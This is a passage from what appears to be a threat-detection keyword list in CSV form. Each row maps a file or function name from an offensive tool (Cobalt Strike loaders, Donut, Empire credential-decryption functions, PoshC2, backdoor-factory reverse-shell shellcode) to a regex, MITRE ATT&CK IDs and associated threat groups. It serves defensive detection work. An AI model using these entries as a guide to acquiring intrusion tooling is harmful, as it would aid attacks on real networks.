"*Load-Bof(*",".{0,1000}Load\-Bof\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","51174"
"*loaddll64.exe*",".{0,1000}loaddll64\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51175"
"*loader.x64.exe.exe*",".{0,1000}loader\.x64\.exe\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","51176"
"*loader/inject.c*",".{0,1000}loader\/inject\.c.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","51177"
"*loader/inject_local.c*",".{0,1000}loader\/inject_local\.c.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","51178"
"*loader/loader/loader.c*",".{0,1000}loader\/loader\/loader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","51179"
"*loader_exe_x64.*",".{0,1000}loader_exe_x64\..{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","51180"
"*loader_exe_x86.*",".{0,1000}loader_exe_x86\..{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","51181"
"*Loader'z WEB shell*",".{0,1000}Loader\'z\sWEB\sshell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","51182"
"*LoadEWSDLL*",".{0,1000}LoadEWSDLL.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","51183"
"*loadKirbiFile*",".{0,1000}loadKirbiFile.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","51184"
"*loadliba_reverse_tcp.asm*",".{0,1000}loadliba_reverse_tcp\.asm.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","51185"
"*loadliba_shell.asm*",".{0,1000}loadliba_shell\.asm.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","51186"
"*loadliba_single_shell_reverse_tcp.asm*",".{0,1000}loadliba_single_shell_reverse_tcp\.asm.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","51187"
"*loadmodule *.ps1*",".{0,1000}loadmodule\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","51188"
"*loadmodume */modules/*.ps1**",".{0,1000}loadmodume\s.{0,1000}\/modules\/.{0,1000}\.ps1.{0,1000}.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","51189"
"*Load-PSObfuscation*",".{0,1000}Load\-PSObfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","51190"
"*Load-PyFuscation*",".{0,1000}Load\-PyFuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","51191"
"*local:Get-DecryptedCpassword*",".{0,1000}local\:Get\-DecryptedCpassword.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51194"
"*Local:Get-DecryptedSitelistPassword*",".{0,1000}Local\:Get\-DecryptedSitelistPassword.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51195"
"*Local:Get-DelegateType*",".{0,1000}Local\:Get\-DelegateType.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51196"
"*Local:Get-KeePassXMLFields*",".{0,1000}Local\:Get\-KeePassXMLFields.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51197"
"*Local:Get-PEArchitecture*",".{0,1000}Local\:Get\-PEArchitecture.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51198"
"*Local:Get-ProcAddress*",".{0,1000}Local\:Get\-ProcAddress.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51199"
"*Local:Invoke-PatchDll*",".{0,1000}Local\:Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51200"
"*local:Invoke-PatchDll*",".{0,1000}local\:Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","51201"
"*Local:Invoke-WscriptElevate*",".{0,1000}Local\:Invoke\-WscriptElevate.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51202"
"*Local:Invoke-WscriptTrigger*",".{0,1000}Local\:Invoke\-WscriptTrigger.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - 